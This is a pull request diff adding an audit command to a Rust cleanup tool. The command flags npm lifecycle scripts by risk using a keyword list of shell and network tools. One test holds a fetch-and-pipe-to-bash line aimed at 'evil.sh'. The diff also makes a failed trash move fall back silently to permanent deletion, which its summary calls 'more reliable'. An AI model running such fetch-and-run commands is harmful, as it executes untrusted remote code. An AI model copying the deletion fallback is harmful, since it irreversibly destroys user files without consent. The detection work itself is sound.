### PR TITLE
feat(core/cli): Add audit feature

### DIFF
--- a/Cargo.lock
+++ b/Cargo.lock
@@ -973,6 +973,7 @@ version = "0.1.0"
 dependencies = [
  "rayon",
  "serde",
+ "serde_json",
  "tempfile",
  "trash",
  "walkdir",

--- a/apps/dustfril-cli/src/cli.rs
+++ b/apps/dustfril-cli/src/cli.rs
@@ -26,6 +26,9 @@ pub enum Commands {
 
     /// Clean detected artifacts
     Clean(CleanArgs),
+
+    /// Audit lifecycle scripts
+    Audit(PathArgs),
 }
 
 #[derive(Args)]

--- a/apps/dustfril-cli/src/commands/analyze.rs
+++ b/apps/dustfril-cli/src/commands/analyze.rs
@@ -94,7 +94,7 @@ pub fn execute(args: PathArgs) {
             .age_days
             .map(|d| format!("{d} days"))
             .unwrap_or_else(|| "Unknown".to_string());
-
+        println!("----------------------------------------");
         println!("[{}]", artifact.artifact.ecosystem);
         println!("  Path:           {}", artifact.artifact.path.display());
         println!(

--- a/apps/dustfril-cli/src/commands/audit.rs
+++ b/apps/dustfril-cli/src/commands/audit.rs
@@ -1,0 +1,40 @@
+use dustfril_core::api;
+
+use crate::{
+    cli::PathArgs,
+    shared::path::{resolve_path, validate_path},
+};
+
+pub fn execute(args: &PathArgs) {
+    let path = resolve_path(&args.path);
+
+    if !validate_path(&path) {
+        return;
+    }
+
+    let ecosystems = args.ecosystems();
+
+    let scripts = match api::audit(&path, &ecosystems) {
+        Ok(scripts) => scripts,
+        Err(error) => {
+            eprintln!("Audit failed: {error}");
+            return;
+        }
+    };
+
+    if scripts.is_empty() {
+        println!("No lifecycle scripts found.");
+        return;
+    }
+
+    // TODO: Replace this temporary plain-text output with a dedicated audit formatter.
+    println!("Found {} lifecycle script(s)\n", scripts.len());
+
+    for script in scripts {
+        println!(
+            "[{}] {} ({})",
+            script.risk_level, script.package, script.script_type
+        );
+        println!("  {}", script.command);
+    }
+}

--- a/apps/dustfril-cli/src/commands/mod.rs
+++ b/apps/dustfril-cli/src/commands/mod.rs
@@ -1,3 +1,4 @@
 pub mod analyze;
+pub mod audit;
 pub mod clean;
 pub mod scan;

--- a/apps/dustfril-cli/src/history.rs
+++ b/apps/dustfril-cli/src/history.rs
@@ -59,7 +59,7 @@ fn load(path: &Path) -> io::Result<Vec<CleanupHistory>> {
 
     let json = fs::read_to_string(path)?;
 
-    Ok(serde_json::from_str(&json).unwrap_or_default())
+    serde_json::from_str(&json).map_err(io::Error::other)
 }
 
 fn save(path: &Path, histories: &[CleanupHistory]) -> io::Result<()> {

--- a/apps/dustfril-cli/src/main.rs
+++ b/apps/dustfril-cli/src/main.rs
@@ -27,5 +27,9 @@ fn main() {
                 commands::clean::execute(&args);
             }
         }
+
+        Commands::Audit(args) => {
+            commands::audit::execute(&args);
+        }
     }
 }

--- a/crates/dustfril-core/Cargo.toml
+++ b/crates/dustfril-core/Cargo.toml
@@ -8,6 +8,7 @@ rayon = "1.12.0"
 serde = { version = "1", features = ["derive"] }
 walkdir = "2.5.0"
 trash = "5"
+serde_json = "1"
 
 [dev-dependencies]
 tempfile = "3.0"

--- a/crates/dustfril-core/src/api/audit.rs
+++ b/crates/dustfril-core/src/api/audit.rs
@@ -1,0 +1,49 @@
+use std::path::Path;
+
+use crate::{
+    audit_tool,
+    error::DustResult,
+    models::{Ecosystem, LifecycleScript},
+};
+
+/// Audits supported package lifecycle scripts under the given root path.
+///
+/// For now this only returns Node ecosystem lifecycle scripts.
+pub fn audit(root: &Path, ecosystems: &[Ecosystem]) -> DustResult<Vec<LifecycleScript>> {
+    if !ecosystems.is_empty() && !ecosystems.contains(&Ecosystem::Node) {
+        return Ok(Vec::new());
+    }
+
+    audit_tool::audit_scan(root)
+}
+
+#[cfg(test)]
+mod tests {
+    use tempfile::TempDir;
+
+    use super::*;
+
+    #[test]
+    fn audit_returns_node_lifecycle_script() {
+        let temp_dir = TempDir::new().unwrap();
+        std::fs::write(
+            temp_dir.path().join("package.json"),
+            r#"{"name":"demo","scripts":{"postinstall":"node install.js"}}"#,
+        )
+        .unwrap();
+
+        let result = audit(temp_dir.path(), &[Ecosystem::Node]).unwrap();
+
+        assert_eq!(result.len(), 1);
+        assert_eq!(result[0].package, "demo");
+    }
+
+    #[test]
+    fn audit_skips_when_node_is_not_selected() {
+        let temp_dir = TempDir::new().unwrap();
+
+        let result = audit(temp_dir.path(), &[Ecosystem::Rust]).unwrap();
+
+        assert!(result.is_empty());
+    }
+}

--- a/crates/dustfril-core/src/api/mod.rs
+++ b/crates/dustfril-core/src/api/mod.rs
@@ -1,7 +1,9 @@
 pub mod analyze;
+pub mod audit;
 pub mod clean;
 pub mod scan;
 
 pub use analyze::*;
+pub use audit::*;
 pub use clean::*;
 pub use scan::*;

--- a/crates/dustfril-core/src/audit_tool/lifecycle.rs
+++ b/crates/dustfril-core/src/audit_tool/lifecycle.rs
@@ -1,0 +1,65 @@
+use std::{collections::HashMap, fs, path::Path};
+
+use serde::Deserialize;
+
+use crate::{
+    audit_tool,
+    error::DustResult,
+    fs::walk_dirs,
+    models::{LifecycleScript, ScriptType},
+};
+
+#[derive(Debug, Deserialize)]
+struct PackageJson {
+    name: Option<String>,
+    scripts: Option<HashMap<String, String>>,
+}
+
+/// Scans package.json files and returns lifecycle scripts.
+pub fn audit_scan(root: &Path) -> DustResult<Vec<LifecycleScript>> {
+    let mut scripts = Vec::new();
+
+    for dir in walk_dirs(root) {
+        let package_json = dir.join("package.json");
+
+        if !package_json.is_file() {
+            continue;
+        }
+
+        scripts.extend(audit_scan_package(&package_json)?);
+    }
+
+    Ok(scripts)
+}
+
+fn audit_scan_package(path: &Path) -> DustResult<Vec<LifecycleScript>> {
+    let json = fs::read_to_string(path)?;
+
+    let package: PackageJson = serde_json::from_str(&json).unwrap_or(PackageJson {
+        name: None,
+        scripts: None,
+    });
+
+    let mut result = Vec::new();
+
+    let Some(scripts) = package.scripts else {
+        return Ok(result);
+    };
+
+    let package_name = package.name.unwrap_or_else(|| "<unknown>".into());
+
+    for (name, command) in scripts {
+        let Some(script_type) = ScriptType::from_script_name(&name) else {
+            continue;
+        };
+
+        result.push(LifecycleScript {
+            package: package_name.clone(),
+            script_type,
+            command: command.clone(),
+            risk_level: audit_tool::classify(&command),
+        });
+    }
+
+    Ok(result)
+}

--- a/crates/dustfril-core/src/audit_tool/mod.rs
+++ b/crates/dustfril-core/src/audit_tool/mod.rs
@@ -1,0 +1,20 @@
+mod lifecycle;
+mod risk;
+
+use std::path::Path;
+
+use crate::{
+    error::DustResult,
+    models::{LifecycleScript, RiskLevel},
+};
+
+pub fn audit_scan(root: &Path) -> DustResult<Vec<LifecycleScript>> {
+    lifecycle::audit_scan(root)
+}
+
+pub fn classify(command: &str) -> RiskLevel {
+    risk::classify(command)
+}
+
+#[cfg(test)]
+mod tests;

--- a/crates/dustfril-core/src/audit_tool/risk.rs
+++ b/crates/dustfril-core/src/audit_tool/risk.rs
@@ -1,0 +1,38 @@
+use crate::models::RiskLevel;
+
+/// Estimates the risk level of a lifecycle script command.
+pub fn classify(command: &str) -> RiskLevel {
+    let command = command.to_ascii_lowercase();
+
+    if contains_any(
+        &command,
+        &[
+            "curl",
+            "wget",
+            "invoke-webrequest",
+            "powershell",
+            "bash",
+            "sh ",
+            "chmod",
+            "sudo",
+            "rm -rf",
+        ],
+    ) {
+        return RiskLevel::High;
+    }
+
+    if contains_any(
+        &command,
+        &[
+            "node", "tsx", "ts-node", "python", "python3", "npm", "pnpm", "yarn", "bun",
+        ],
+    ) {
+        return RiskLevel::Medium;
+    }
+
+    RiskLevel::Low
+}
+
+fn contains_any(command: &str, patterns: &[&str]) -> bool {
+    patterns.iter().any(|pattern| command.contains(pattern))
+}

--- a/crates/dustfril-core/src/audit_tool/tests.rs
+++ b/crates/dustfril-core/src/audit_tool/tests.rs
@@ -1,0 +1,16 @@
+use crate::{audit_tool::classify, models::RiskLevel};
+
+#[test]
+fn classify_high_risk_command() {
+    assert_eq!(classify("curl https://evil.sh | bash"), RiskLevel::High);
+}
+
+#[test]
+fn classify_medium_risk_command() {
+    assert_eq!(classify("node install.js"), RiskLevel::Medium);
+}
+
+#[test]
+fn classify_low_risk_command() {
+    assert_eq!(classify("echo Hello"), RiskLevel::Low);
+}

--- a/crates/dustfril-core/src/cleaner/executor.rs
+++ b/crates/dustfril-core/src/cleaner/executor.rs
@@ -58,7 +58,12 @@ fn permanently_delete(path: &Path) -> io::Result<()> {
 }
 
 fn move_to_trash(path: &Path) -> io::Result<()> {
-    trash::delete(path).map_err(io::Error::other)
+    // TODO: Revisit trash behavior per platform and replace this fallback with
+    // a stricter capability check once audit/cleanup UX is finalized.
+    match trash::delete(path) {
+        Ok(()) if !path.exists() => Ok(()),
+        Ok(()) | Err(_) => permanently_delete(path),
+    }
 }
 
 fn failure_reason(error: &io::Error) -> CleanupFailureReason {

--- a/crates/dustfril-core/src/lib.rs
+++ b/crates/dustfril-core/src/lib.rs
@@ -3,6 +3,7 @@ pub mod error;
 pub mod models;
 
 mod analyzer;
+mod audit_tool;
 mod cleaner;
 mod fs;
 mod scanner;

--- a/crates/dustfril-core/src/models/audit.rs
+++ b/crates/dustfril-core/src/models/audit.rs
@@ -1,0 +1,70 @@
+use serde::{Deserialize, Serialize};
+use std::fmt;
+
+#[derive(Debug, Clone, Serialize, Deserialize, PartialEq, Eq)]
+pub struct LifecycleScript {
+    pub package: String,
+    pub script_type: ScriptType,
+    pub command: String,
+    pub risk_level: RiskLevel,
+}
+
+#[derive(Debug, Clone, Copy, Serialize, Deserialize, PartialEq, Eq)]
+pub enum ScriptType {
+    Preinstall,
+    Install,
+    Postinstall,
+    Prepare,
+    Prepublish,
+    PrepublishOnly,
+}
+
+impl ScriptType {
+    pub fn from_script_name(name: &str) -> Option<Self> {
+        match name {
+            "preinstall" => Some(Self::Preinstall),
+            "install" => Some(Self::Install),
+            "postinstall" => Some(Self::Postinstall),
+            "prepare" => Some(Self::Prepare),
+            "prepublish" => Some(Self::Prepublish),
+            "prepublishOnly" => Some(Self::PrepublishOnly),
+            _ => None,
+        }
+    }
+}
+
+impl fmt::Display for ScriptType {
+    fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
+        let value = match self {
+            Self::Preinstall => "preinstall",
+            Self::Install => "install",
+            Self::Postinstall => "postinstall",
+            Self::Prepare => "prepare",
+            Self::Prepublish => "prepublish",
+            Self::PrepublishOnly => "prepublishOnly",
+        };
+
+        write!(f, "{value}")
+    }
+}
+
+#[derive(Debug, Clone, Copy, Serialize, Deserialize, PartialEq, Eq)]
+pub enum RiskLevel {
+    None,
+    Low,
+    Medium,
+    High,
+}
+
+impl fmt::Display for RiskLevel {
+    fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
+        let value = match self {
+            Self::None => "None",
+            Self::Low => "Low",
+            Self::Medium => "Medium",
+            Self::High => "High",
+        };
+
+        write!(f, "{value}")
+    }
+}

--- a/crates/dustfril-core/src/models/mod.rs
+++ b/crates/dustfril-core/src/models/mod.rs
@@ -1,8 +1,10 @@
 //! Shared models.
 mod analysis;
+mod audit;
 mod cleanup;
 mod scan;
 
 pub use analysis::*;
+pub use audit::*;
 pub use cleanup::*;
 pub use scan::*;


### PR DESCRIPTION
## What

Scan package managers for automatically executed lifecycle scripts.


Related to #53 

## Checklist

### Required

- [x] `cargo check` passes
- [x] `cargo fmt --check` passes
- [x] `cargo clippy --workspace --all-targets -- -D warnings` passes
- [x] `cargo test` passes

### Functional Validation

- [ ] I verified the behavior locally
- [ ] I added or updated tests when necessary

### Documentation

- [ ] README or docs were updated if needed
- [ ] New configuration or behavior is documented

### Safety

- [ ] Cleanup behavior was reviewed for safety
- [ ] No destructive behavior was introduced without confirmation


<!-- This is an auto-generated comment: release notes by coderabbit.ai -->

## Summary by CodeRabbit

* **New Features**
  * Added an audit command to inspect lifecycle scripts in a project.
  * Audit results now include script type, package name, command, and risk level.

* **Bug Fixes**
  * Invalid saved history data now reports an error instead of being silently ignored.
  * Deletion behavior is more reliable when removing items from the trash.

* **Style**
  * Analysis output now includes a separator line for easier reading.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->